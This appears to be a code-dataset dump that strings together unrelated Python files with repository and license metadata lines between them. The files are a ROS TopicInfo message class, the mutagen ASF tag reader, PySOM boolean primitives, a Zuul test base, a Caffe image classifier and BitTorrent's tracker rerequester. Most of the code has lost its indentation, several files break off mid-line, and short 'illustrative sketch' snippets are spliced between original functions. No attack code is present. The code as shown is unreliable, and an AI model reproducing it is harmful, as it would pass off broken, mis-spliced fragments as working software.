ID_SERVICE_CLIENT = 4
ID_PARAMETER_REQUEST = 6
ID_LOG = 7
ID_TIME = 10
ID_TX_STOP = 11
__slots__ = ['topic_id','topic_name','message_type','md5sum','buffer_size']
_slot_types = ['uint16','string','string','string','int32']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
    set to None will be assigned a default value. The recommended
    use is keyword arguments, as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
topic_id,topic_name,message_type,md5sum,buffer_size
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(TopicInfo, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.topic_id is None:
self.topic_id = 0
if self.topic_name is None:
self.topic_name = ''
if self.message_type is None:
self.message_type = ''
if self.md5sum is None:
self.md5sum = ''
if self.buffer_size is None:
self.buffer_size = 0
else:
self.topic_id = 0
self.topic_name = ''
self.message_type = ''
self.md5sum = ''
self.buffer_size = 0
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
buff.write(_struct_H.pack(self.topic_id))
_x = self.topic_name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
if python3:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.message_type
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
if python3:
        buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
        buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.md5sum
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
if python3:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
buff.write(_struct_i.pack(self.buffer_size))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(_x))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(_x))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
end = 0
start = end
end += 2
(self.topic_id,) = _struct_H.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.topic_name = str[start:end].decode('utf-8')
else:
self.topic_name = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.message_type = str[start:end].decode('utf-8')
else:
self.message_type = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.md5sum = str[start:end].decode('utf-8')
else:
self.md5sum = str[start:end]
start = end
end += 4
(self.buffer_size,) = _struct_i.unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
buff.write(_struct_H.pack(self.topic_id))
_x = self.topic_name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
if python3:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.message_type
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
if python3:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.md5sum
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
if python3:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
buff.write(_struct_i.pack(self.buffer_size))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(_x))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(_x))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
end = 0
start = end
end += 2
(self.topic_id,) = _struct_H.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.topic_name = str[start:end].decode('utf-8')
else:
self.topic_name = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.message_type = str[start:end].decode('utf-8')
else:
self.message_type = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.md5sum = str[start:end].decode('utf-8')
else:
self.md5sum = str[start:end]
start = end
end += 4
(self.buffer_size,) = _struct_i.unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
_struct_i = struct.Struct("<i")
_struct_H = struct.Struct("<H")
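# Illustrative round-trip sketch (not part of the generated module): shows how
# the serialize()/deserialize() pair above is typically exercised; the field
# values below are arbitrary examples.
if __name__ == '__main__':
    from io import BytesIO
    info = TopicInfo(topic_id=101, topic_name='/chatter',
                     message_type='std_msgs/String',
                     md5sum='992ce8a1687cec8c8bd883ec73ca41d1', buffer_size=512)
    buff = BytesIO()
    info.serialize(buff)
    decoded = TopicInfo().deserialize(buff.getvalue())
    assert decoded.topic_id == 101 and decoded.topic_name == '/chatter'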
|
berdario/mutagen
|
mutagen/asf.py
|
Python
|
gpl-2.0
| 21,198
| 0.000849
|
# Copyright 2006-2007 Lukas Lalinsky
# Copyright 2005-2006 Joe Wreschnig
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# $Id: asf.py 4224 2007-12-03 09:01:49Z luks $
"""Read and write ASF (Window Media Audio) files."""
__all__ = ["ASF", "Open"]
from functools import total_ordering
from mutagen import FileType, Metadata
from mutagen._util import insert_bytes, delete_bytes, DictMixin, struct_pack, struct_unpack, text_type, string_types
class error(IOError): pass
class ASFError(error): pass
class ASFHeaderError(error): pass
class ASFInfo(object):
"""ASF stream information."""
def __init__(self):
self.length = 0.0
self.sample_rate = 0
self.bitrate = 0
self.channels = 0
def pprint(self):
s = "Windows Media Audio %d bps, %s Hz, %d channels, %.2f seconds" % (
self.bitrate, self.sample_rate, self.channels, self.length)
return s
class ASFTags(list, DictMixin, Metadata):
"""Dictionary containing ASF attributes."""
def pprint(self):
return "\n".join(["%s=%s" % (k, v) for k, v in self])
def __getitem__(self, key):
"""A list of values for the key.
This is a copy, so comment['title'].append('a title') will not
work.
"""
values = [value for (k, value) in self if k == key]
if not values: raise KeyError(key)
else: return values
def __delitem__(self, key):
"""Delete all values associated with the key."""
to_delete = [x for x in self if x[0] == key]
if not to_delete: raise KeyError(key)
else: list(map(self.remove, to_delete))
def __contains__(self, key):
"""Return true if the key has any values."""
for k, value in self:
if k == key: return True
else: return False
def __setitem__(self, key, values):
"""Set a key's value or values.
Setting a value overwrites all old ones. The value may be a
        list of Unicode or UTF-8 strings, or a single Unicode or UTF-8
string.
"""
        if not isinstance(values, list):
values = [values]
try: del(self[key])
except KeyError: pass
for value in values:
if key in _standard_attribute_names:
value = text_type(value)
elif not isinstance(value, ASFBaseAttribute):
if isinstance(value, string_types):
value = ASFUnicodeAttribute(value)
elif isinstance(value, bool):
value = ASFBoolAttribute(value)
elif isinstance(value, int):
value = ASFQWordAttribute(value)
self.append((key, value))
def keys(self):
"""Return all keys in the comment."""
return self and set(next(iter(zip(*self))))
def as_dict(self):
"""Return a copy of the comment data in a real dict."""
d = {}
for key, value in self:
d.setdefault(key, []).append(value)
return d
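# --- Illustrative usage sketch (not part of the original file) ---
# ASFTags acts like a multi-valued dictionary; assuming this module is
# importable as mutagen.asf, the tag container can be exercised on its own:
from mutagen.asf import ASFTags

tags = ASFTags()
tags["WM/AlbumTitle"] = [u"An Album"]    # __setitem__ replaces any old values
assert "WM/AlbumTitle" in tags           # __contains__
assert len(tags["WM/AlbumTitle"]) == 1   # __getitem__ returns a list copy
del tags["WM/AlbumTitle"]                # __delitem__ removes every value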
@total_ordering
class ASFBaseAttribute(object):
"""Generic attribute."""
TYPE = None
def __init__(self, value=None, data=None, language=None,
stream=None, **kwargs):
self.language = language
self.stream = stream
if data:
self.value = self.parse(data, **kwargs)
else:
self.value = value
def data_size(self):
raise NotImplementedError
def __repr__(self):
name = "%s(%r" % (type(self).__name__, self.value)
if self.language:
name += ", language=%d" % self.language
if self.stream:
name += ", stream=%d" % self.stream
name += ")"
return name
def render(self, name):
name = name.encode("utf-16-le") + b"\x00\x00"
data = self._render()
return (struct_pack("<H", len(name)) + name +
struct_pack("<HH", self.TYPE, len(data)) + data)
def render_m(self, name):
name = name.encode("utf-16-le") + b"\x00\x00"
if self.TYPE == 2:
data = self._render(dword=False)
else:
data = self._render()
return (struct_pack("<HHHHI", 0, self.stream or 0, len(name),
self.TYPE, len(data)) + name + data)
def render_ml(self, name):
name = name.encode("utf-16-le") + b"\x00\x00"
if self.TYPE == 2:
data = self._render(dword=False)
else:
data = self._render()
return (struct_pack("<HHHHI", self.language or 0, self.stream or 0,
len(name), self.TYPE, len(data)) + name + data)
def __lt__(self, other):
return self.value < other
def __eq__(self, other):
return self.value == other
class ASFUnicodeAttribute(ASFBaseAttribute):
"""Unicode string attribute."""
TYPE = 0x0000
def parse(self, data):
return data.decode("utf-16-le").strip("\x00")
def _render(self):
return self.value.encode("utf-16-le") + b"\x00\x00"
def data_size(self):
return len(self.value) * 2 + 2
def __str__(self):
return self.value
__hash__ = ASFBaseAttribute.__hash__
class ASFByteArrayAttribute(ASFBaseAttribute):
"""Byte array attribute."""
TYPE = 0x0001
def parse(self, data):
return data
def _render(self):
return self.value
def data_size(self):
return len(self.value)
def __str__(self):
return "[binary data (%s bytes)]" % len(self.value)
def __lt__(self, other):
return str(self) < other
def __eq__(self, other):
return str(self) == other
__hash__ = ASFBaseAttribute.__hash__
class ASFBoolAttribute(ASFBaseAttribute):
"""Bool attribute."""
TYPE = 0x0002
def parse(self, data, dword=True):
if dword:
return struct_unpack("<I", data)[0] == 1
else:
return struct_unpack("<H", data)[0] == 1
def _render(self, dword=True):
if dword:
return struct_pack("<I", int(self.value))
else:
return struct_pack("<H", int(self.value))
def data_size(self):
return 4
def __bool__(self):
return self.value
def __str__(self):
return str(self.value)
__hash__ = ASFBaseAttribute.__hash__
class ASFDWordAttribute(ASFBaseAttribute):
"""DWORD attribute."""
TYPE = 0x0003
def parse(self, data):
return struct_unpack("<L", data)[0]
def _render(self):
return struct_pack("<L", self.value)
def data_size(self):
return 4
def __int__(self):
return self.value
def __str__(self):
return str(self.value)
__hash__ = ASFBaseAttribute.__hash__
class ASFQWordAttribute(ASFBaseAttribute):
"""QWORD attribute."""
TYPE = 0x0004
def parse(self, data):
return struct_unpack("<Q", data)[0]
def _render(self):
return struct_pack("<Q", self.value)
def data_size(self):
return 8
def __int__(self):
return self.value
def __str__(self):
return str(self.value)
__hash__ = ASFBaseAttribute.__hash__
class ASFWordAttribute(ASFBaseAttribute):
"""WORD attribute."""
TYPE = 0x0005
def parse(self, data):
return struct_unpack("<H", data)[0]
def _render(self):
return struct_pack("<H", self.value)
def data_size(self):
return 2
def __int__(self):
return self.value
def __str__(self):
return str(self.value)
__hash__ = ASFBaseAttribute.__hash__
class ASFGUIDAttribute(ASFBaseAttribute):
"""GUID attribute."""
TYPE = 0x0006
def parse(self, data):
return data
def _render(self):
return self.value
def data_size(self):
return len(self.value)
def __str__(self):
return self.value
__hash__ = ASFBaseAttribute.__hash__
UNICODE = ASFUnicodeAttribute.TYPE
BYTEARRAY = ASFByteArrayAttribute.TYPE
BOOL = ASF
|
ergonomica/ergonomica
|
tests/stdlib/test_help.py
|
Python
|
gpl-2.0
| 375
| 0.010667
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
[tests/stdlib/test_help.py]
Test the help command.
"""
import unittest
#import os
#from ergonomica import ergo, ENV
class TestHelp(unittest.TestCase):
"""Tests the 'help' command."""
def test_list_commands(self):
"""
Tests listing all commands using the 'help commands' command.
"""
|
SOM-st/PySOM
|
src/som/primitives/true_primitives.py
|
Python
|
mit
| 1,649
| 0.003032
|
from som.interp_type import is_ast_interpreter
from som.primitives.primitives import Primitives
from som.vm.globals import trueObject, falseObject, nilObject
from som.vmobjects.primitive import UnaryPrimitive, BinaryPrimitive, TernaryPrimitive
if is_ast_interpreter():
from som.vmobjects.block_ast import AstBlock as _Block
else:
from som.vmobjects.block_bc import BcBlock as _Block
def _not(_rcvr):
return falseObject
def _or(_rcvr, _arg):
return trueObject
def _and_and_if_true(_rcvr, arg):
if isinstance(arg, _Block):
block_method = arg.get_method()
return block_method.invoke_1(arg)
return arg
def _if_false(_rcvr, _arg):
return nilObject
def _if_true_if_false(_rcvr, true_block, _false_block):
if isinstance(true_block, _Block):
block_method = true_block.get_method()
return block_method.invoke_1(true_block)
return true_block
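# --- Illustrative sketch (not from the original interpreter code) ---
# The primitive above mirrors Smalltalk-style boolean dispatch: on the true
# object, ifTrue:ifFalse: evaluates only the first block. A rough Python
# analogue using thunks:
def if_true_if_false(receiver_is_true, true_thunk, false_thunk):
    return true_thunk() if receiver_is_true else false_thunk()

assert if_true_if_false(True, lambda: "yes", lambda: "no") == "yes"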
class TruePrimitivesBase(Primitives):
def install_primitives(self):
self._install_instance_primitive(UnaryPrimitive("not", _not))
        self._install_instance_primitive(BinaryPrimitive("or:", _or))
        self._install_instance_primitive(BinaryPrimitive("||", _or))
        self._install_instance_primitive(BinaryPrimitive("and:", _and_and_if_true))
self._install_instance_primitive(BinaryPrimitive("&&", _and_and_if_true))
self._install_instance_primitive(BinaryPrimitive("ifTrue:", _and_and_if_true))
self._install_instance_primitive(BinaryPrimitive("ifFalse:", _if_false))
self._install_instance_primitive(
TernaryPrimitive("ifTrue:ifFalse:", _if_true_if_false)
)
|
wikimedia/integration-zuul
|
tests/base.py
|
Python
|
apache-2.0
| 52,328
| 0.000191
|
#!/usr/bin/env python
# Copyright 2012 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from six.moves import configparser as ConfigParser
import gc
import hashlib
import json
import logging
import os
import pprint
from six.moves import queue as Queue
from six.moves import urllib
import random
import re
import select
import shutil
from six.moves import reload_module
import socket
import string
import subprocess
import swiftclient
import threading
import time
import git
import gear
import fixtures
import statsd
import testtools
from git import GitCommandError
import zuul.connection.gerrit
import zuul.connection.smtp
import zuul.scheduler
import zuul.webapp
import zuul.rpclistener
import zuul.launcher.gearman
import zuul.lib.swift
import zuul.merger.client
import zuul.merger.merger
import zuul.merger.server
import zuul.reporter.gerrit
import zuul.reporter.smtp
import zuul.source.gerrit
import zuul.trigger.gerrit
import zuul.trigger.timer
import zuul.trigger.zuultrigger
FIXTURE_DIR = os.path.join(os.path.dirname(__file__),
'fixtures')
USE_TEMPDIR = True
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s %(name)-32s '
'%(levelname)-8s %(message)s')
def repack_repo(path):
cmd = ['git', '--git-dir=%s/.git' % path, 'repack', '-afd']
output = subprocess.Popen(cmd, close_fds=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out = output.communicate()
if output.returncode:
raise Exception("git repack returned %d" % output.returncode)
return out
def random_sha1():
return hashlib.sha1(str(random.random())).hexdigest()
def iterate_timeout(max_seconds, purpose):
start = time.time()
count = 0
while (time.time() < start + max_seconds):
count += 1
yield count
time.sleep(0)
raise Exception("Timeout waiting for %s" % purpose)
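# --- Illustrative sketch (not part of the original test helpers) ---
# iterate_timeout above yields until a deadline passes; the same idea as a
# plain polling helper, with an always-true condition standing in for a real
# readiness check:
import time

def wait_until(predicate, max_seconds, purpose):
    start = time.time()
    while time.time() < start + max_seconds:
        if predicate():
            return True
        time.sleep(0)
    raise Exception("Timeout waiting for %s" % purpose)

assert wait_until(lambda: True, 1, "a condition that is already true")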
class ChangeReference(git.Reference):
_common_path_default = "refs/changes"
_points_to_commits_only = True
class FakeChange(object):
categories = {'APRV': ('Approved', -1, 1),
'CRVW': ('Code-Review', -2, 2),
'VRFY': ('Verified', -2, 2)}
def __init__(self, gerrit, number, project, branch, subject,
status='NEW', upstream_root=None):
self.gerrit = gerrit
self.reported = 0
self.queried = 0
self.patchsets = []
self.number = number
self.project = project
self.branch = branch
self.subject = subject
self.latest_patchset = 0
self.depends_on_change = None
self.needed_by_changes = []
self.fail_merge = False
self.messages = []
self.data = {
'branch': branch,
'comments': [],
'commitMessage': subject,
'createdOn': time.time(),
'id': 'I' + random_sha1(),
'lastUpdated': time.time(),
'number': str(number),
'open': status == 'NEW',
'owner': {'email': 'user@example.com',
'name': 'User Name',
'username': 'username'},
'patchSets': self.patchsets,
'project': project,
'status': status,
'subject': subject,
'submitRecords': [],
'url': 'https://hostname/%s' % number}
self.upstream_root = upstream_root
self.addPatchset()
self.data['submitRecords'] = self.getSubmitRecords()
self.open = status == 'NEW'
def add_fake_change_to_repo(self, msg, fn, large):
path = os.path.join(self.upstream_root, self.project)
repo = git.Repo(path)
ref = ChangeReference.create(repo, '1/%s/%s' % (self.number,
self.latest_patchset),
'refs/tags/init')
repo.head.reference = ref
zuul.merger.merger.reset_repo_to_head(repo)
repo.git.clean('-x', '-f', '-d')
path = os.path.join(self.upstream_root, self.project)
if not large:
fn = os.path.join(path, fn)
f = open(fn, 'w')
f.write("test %s %s %s\n" %
(self.branch, self.number, self.latest_patchset))
f.close()
repo.index.add([fn])
else:
for fni in range(100):
fn = os.path.join(path, str(fni))
f = open(fn, 'w')
for ci in range(4096):
f.write(random.choice(string.printable))
f.close()
repo.index.add([fn])
r = repo.index.commit(msg)
repo.head.reference = 'master'
zuul.merger.merger.reset_repo_to_head(repo)
repo.git.clean('-x', '-f', '-d')
repo.heads['master'].checkout()
return r
def addPatchset(self, files=[], large=False):
self.latest_patchset += 1
if files:
fn = files[0]
        else:
            fn = '%s-%s' % (self.branch.replace('/', '_'), self.number)
        msg = self.subject + '-' + str(self.latest_patchset)
        c = self.add_fake_change_to_repo(msg, fn, large)
        ps_files = [{'file': '/COMMIT_MSG',
                     'type': 'ADDED'},
{'file': 'README',
'type': 'MODIFIED'}]
for f in files:
ps_files.append({'file': f, 'type': 'ADDED'})
d = {'approvals': [],
'createdOn': time.time(),
'files': ps_files,
'number': str(self.latest_patchset),
'ref': 'refs/changes/1/%s/%s' % (self.number,
self.latest_patchset),
'revision': c.hexsha,
'uploader': {'email': 'user@example.com',
'name': 'User name',
'username': 'user'}}
self.data['currentPatchSet'] = d
self.patchsets.append(d)
self.data['submitRecords'] = self.getSubmitRecords()
def getPatchsetCreatedEvent(self, patchset):
event = {"type": "patchset-created",
"change": {"project": self.project,
"branch": self.branch,
"id": "I5459869c07352a31bfb1e7a8cac379cabfcb25af",
"number": str(self.number),
"subject": self.subject,
"owner": {"name": "User Name"},
"url": "https://hostname/3"},
"patchSet": self.patchsets[patchset - 1],
"uploader": {"name": "User Name"}}
return event
def getChangeRestoredEvent(self):
event = {"type": "change-restored",
"change": {"project": self.project,
"branch": self.branch,
"id": "I5459869c07352a31bfb1e7a8cac379cabfcb25af",
"number": str(self.number),
"subject": self.subject,
"owner": {"name": "User Name"},
"url": "https://hostname/3"},
"restorer": {"name": "User Name"},
"patchSet": self.patchsets[-1],
"reason": ""}
return event
def getChangeAbandonedEvent(self):
event = {"type": "change-abandoned",
"change": {"project": self.project,
"branch": self.branch,
"id": "I5459869c07352a31bfb1e7a8cac379cabfcb25
|
dgschwend/hls_OO
|
TESTDATA_MAXI/data/classify.py
|
Python
|
gpl-3.0
| 14,639
| 0.012637
|
#!/usr/bin/env python2
# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved.
"""
Classify an image using individual model files
Use this script as an example to build your own tool
"""
import argparse
import os
import time
import struct
from google.protobuf import text_format
import numpy as np
import PIL.Image
import scipy.misc, scipy.ndimage
os.environ['GLOG_minloglevel'] = '2' # Suppress most caffe output
import caffe
from caffe.proto import caffe_pb2
def get_net(caffemodel, deploy_file, use_gpu=True):
"""
Returns an instance of caffe.Net
Arguments:
caffemodel -- path to a .caffemodel file
deploy_file -- path to a .prototxt file
Keyword arguments:
use_gpu -- if True, use the GPU for inference
"""
if use_gpu:
caffe.set_mode_gpu()
# load a new model
return caffe.Net(deploy_file, caffemodel, caffe.TEST)
# def get_transformer(deploy_file, mean_file=None):
# """
# Returns an instance of caffe.io.Transformer
#
# Arguments:
# deploy_file -- path to a .prototxt file
#
# Keyword arguments:
# mean_file -- path to a .binaryproto file (optional)
# """
# network = caffe_pb2.NetParameter()
# with open(deploy_file) as infile:
# text_format.Merge(infile.read(), network)
#
# if network.input_shape:
# dims = network.input_shape[0].dim
# else:
# dims = network.input_dim[:4]
#
# t = caffe.io.Transformer(
# inputs = {'data': dims}
# )
# #t.set_transpose('data', (2,0,1)) # transpose to (channels, height, width)
#
# # color images
# if dims[1] == 3:
# # channel swap
# t.set_channel_swap('data', (2,1,0))
# pass
#
# # MEAN SUBTRACT
# #t.set_mean('data', np.array([104, 117, 123]))
#
# return t
def load_image(path, height, width, mode='RGB'):
"""
Load an image from disk
Returns an np.ndarray (channels x width x height)
Arguments:
path -- path to an image on disk
width -- resize dimension
height -- resize dimension
Keyword arguments:
mode -- the PIL mode that the image should be converted to
(RGB for color or L for grayscale)
"""
image = PIL.Image.open(path)
image = image.convert(mode)
image = np.array(image)
# half-crop, half-fill
height_ratio = float(image.shape[0])/height
width_ratio = float(image.shape[1])/width
new_ratio = (width_ratio + height_ratio) / 2.0
resize_width = int(round(image.shape[1] / new_ratio))
resize_height = int(round(image.shape[0] / new_ratio))
if width_ratio > height_ratio and (height - resize_height) % 2 == 1:
resize_height += 1
elif width_ratio < height_ratio and (width - resize_width) % 2 == 1:
resize_width += 1
image = scipy.misc.imresize(image, (resize_height, resize_width), interp='bicubic')
if width_ratio > height_ratio:
start = int(round((resize_width-width)/2.0))
image = image[:,start:start+width]
else:
start = int(round((resize_height-height)/2.0))
image = image[start:start+height,:]
# fill ends of dimension that is too short with random noise
if width_ratio > height_ratio:
padding = (height - resize_height)/2
noise_size = (padding, width, 3)
noise = np.random.randint(0, 255, noise_size).astype('uint8')
image = np.concatenate((noise, image, noise), axis=0)
else:
padding = (width - resize_width)/2
noise_size = (height, padding, 3)
noise = np.random.randint(0, 255, noise_size).astype('uint8')
image = np.concatenate((noise, image, noise), axis=1)
processed = np.zeros((3, width, height), np.float32)
# Transpose from (height, width, channels) to (channels, height, width)
#processed = processed.transpose((2,0,1))
# Channel Swap: RGB -> BGR
#image = image[(2,1,0),:,:]
# Subtract Mean, Swap Channels RGB -> BGR, Transpose (H,W,CH) to (CH,H,W)
#mean_rgb = [104,117,123]
processed[0,:,:] = (image[:,:,2]-104.0)
processed[1,:,:] = (image[:,:,1]-117.0)
processed[2,:,:] = (image[:,:,0]-123.0)
return processed
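# --- Illustrative sketch (values are assumptions, not from the original) ---
# The tail of load_image above subtracts a per-channel mean and reorders the
# RGB planes into BGR while moving to (channels, height, width):
import numpy as np

rgb = np.random.randint(0, 255, (8, 8, 3)).astype(np.float32)  # H x W x RGB
mean_bgr = (104.0, 117.0, 123.0)
chw = np.zeros((3, 8, 8), np.float32)
chw[0] = rgb[:, :, 2] - mean_bgr[0]   # B plane minus its mean
chw[1] = rgb[:, :, 1] - mean_bgr[1]   # G plane minus its mean
chw[2] = rgb[:, :, 0] - mean_bgr[2]   # R plane minus its mean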
def forward_pass(image, net, batch_size=None):
"""
Returns scores for each image as an np.ndarray (nImages x nClasses)
Arguments:
images -- a list of np.ndarrays
net -- a caffe.Net
transformer -- a caffe.io.Transformer
Keyword arguments:
batch_size -- how many images can be processed at once
(a high value may result in out-of-memory errors)
"""
net.blobs['data'].data[0] = image
print "net.outputs[-1] = ", net.outputs[-1]
start = time.time()
net.forward()
output = net.blobs[net.outputs[-1]].data
#pool10avg = (net.blobs['pool10'].data).flatten()
#pool10 = pool10avg
#print "conv10 o
|
utput:\n", net.blobs['conv10'].data
#print "pool10 output:", pool10avg
scores = np.copy(output)
end = time.t
|
ime()
print 'Inference took %f seconds ...' % (end - start)
return scores
def read_labels(labels_file):
"""
Returns a list of strings
Arguments:
labels_file -- path to a .txt file
"""
if not labels_file:
return None
labels = []
with open(labels_file) as infile:
for line in infile:
label = line.strip()
if label:
labels.append(label)
assert len(labels), 'No labels found'
return labels
def classify(caffemodel, deploy_file, image_file,
mean_file=None, labels_file=None, batch_size=None, use_gpu=True):
"""
Classify some images against a Caffe model and print the results
Arguments:
caffemodel -- path to a .caffemodel
deploy_file -- path to a .prototxt
image_files -- list of paths to images
Keyword arguments:
mean_file -- path to a .binaryproto
labels_file path to a .txt file
use_gpu -- if True, run inference on the GPU
"""
# Load the model and images
net = get_net(caffemodel, deploy_file, use_gpu)
_, channels, height, width = np.array(net.blobs['data'].shape)
mode = 'RGB'
image = load_image(image_file, height, width, mode)
labels = read_labels(labels_file)
# Structured Input as Image
#W = image.shape[2]
#H = image.shape[1]
#CH = image.shape[0]
#for y in range(H):
# for x in range(W):
# for c in range(CH):
# image[c,x,y] = 1000.0*y+x+c/1000.0#1;
#
# Fixed Parameters for first Filter Bank
# conv1param = np.array(net.params['conv1'][0].data)[:,:,:,:]
# print "shape of conv1param: ", conv1param.shape
# co = conv1param.shape[0]
# ci = conv1param.shape[1]
# kx = conv1param.shape[2]
# ky = conv1param.shape[3]
# pixels = []
# for i in range(ci):
# for o in range(co):
# if i == 0:
# conv1param[o,i] = np.array([[0,0,0],[0,1,0],[0,0,0]])
# else:
# conv1param[o,i] = np.zeros((3,3)) #conv1param[o,i] = np.array([[1,0,0],[0,1,0],[0,1,0]])
#net.params['conv1'][0].data[...] = conv1param
#net.params['conv1'][1].data[...] = np.zeros(net.params['conv1'][1].shape)
# Classify the image
scores = forward_pass(image, net, batch_size=1)
# Fish out some blobs...
indata = np.array(net.blobs['data'].data)[0,:,:,:]
print "shape of indata: ", indata.shape
CH = indata.shape[0]
W = indata.shape[1]
H = indata.shape[2]
pixels = []
for y in range(H):
for x in range(W):
for c in range(CH):
pixel = indata[c,x,y]
if pixel is None: pixel = 99999
pixels.append(pixel);
# Write Pixels to binary file
print("Write to indata File...")
floatstruct = struct.pack('f'*len(pixels), *pixels)
with open("indata.bin", "wb") as f:
f.write(floatstruct)
# Fish out some Parameters...
conv1param = np.array(net.params['conv1'][0].data)[:,:,:,:]
print "shape of conv1param: ", conv1param.shape
co = conv1param.shape[0]
ci = conv1param.shape[1]
kx = conv1param.shape[2]
ky = conv1param.shape[3]
|
mgp/bittorrent-dissected
|
Rerequester.py
|
Python
|
mit
| 9,039
| 0.006195
|
# Written by Bram Cohen
# see LICENSE.txt for license information
from zurllib import urlopen, quote
from btformats import check_peers
from bencode import bdecode
from threading import Thread, Lock
from socket import error, gethostbyname
from time import time
from random import randrange
from binascii import b2a_hex
class Rerequester:
def __init__(self, url, interval, sched, howmany, minpeers,
connect, externalsched, amount_left, up, down,
port, ip, myid, infohash, timeout, errorfunc, maxpeers, doneflag,
upratefunc, downratefunc, ever_got_incoming):
        # The URL and query parameters to always pass.
self.url = ('%s?info_hash=%s&peer_id=%s&port=%s&key=%s' %
(url, quote(infohash), quote(myid), str(port),
b2a_hex(''.join([chr(randrange(256)) for i in xrange(4)]))))
# The IP address of this client.
self.ip = ip
# The time in seconds between requesting more peers.
self.interval = interval
# The last time this client got a reply from the tracker.
self.last = None
# The identifier returned by the tracker, which this client uses on subsequent requests.
self.trackerid = None
# Maximum seconds between sending requests to the tracker.
self.announce_interval = 30 * 60
# Function to schedule events in the reactor loop of RawServer.
self.sched = sched
# Method that returns how many peers this client is connected to.
self.howmany = howmany
# If connected to this many peers, may skip making a request to the tracker.
self.minpeers = minpeers
# Method on Connecter that starts a connection to a peer.
self.connect = connect
# Function to schedule events in the reactor loop of RawServer.
self.externalsched = externalsched
# Method to get the amount of data left.
self.amount_left = amount_left
# Method to get the total bytes uploaded.
self.up = up
# Method to get the total bytes downloaded.
self.down = down
# HTTP timeout when making a request to the tracker.
self.timeout = timeout
# Callback invoked with a string describing any error.
self.errorfunc = errorfunc
# If connected to this many peers, will not request any more from the tracker.
self.maxpeers = maxpeers
# Flag set if we have all pieces and are seeding.
self.doneflag = doneflag
# Method to get the upload rate.
self.upratefunc = upratefunc
# Method to get the download rate.
self.downratefunc = downratefunc
# Method that returns True if we ever got an incoming connection.
self.ever_got_incoming = ever_got_incoming
# True if the last request to the tracker failed.
self.last_failed = True
# The last time this client made a request to the tracker.
self.last_time = 0
def c(self):
# Call this method again later.
self.sched(self.c, self.interval)
# Determine if we need more peers from the tracker.
if self.ever_got_incoming():
# Got an incoming connection.
getmore = self.howmany() <= self.minpeers / 3
else:
# Never got an incoming connection.
# Assume this client is behind a NAT, and aggressively try and connect to other peers.
getmore = self.howmany() < self.minpeers
if getmore or time() - self.last_time > self.announce_interval:
# Need to connect to more peers, or need to simply check-in with the tracker.
self.announce()
def begin(self):
# Method c is the method called at regular intervals to contact the tracker.
self.sched(self.c, self.interval)
# But contact the tracker now. Setting event = 0 specifies starting the download.
self.announce(0)
def announce(self, event = None):
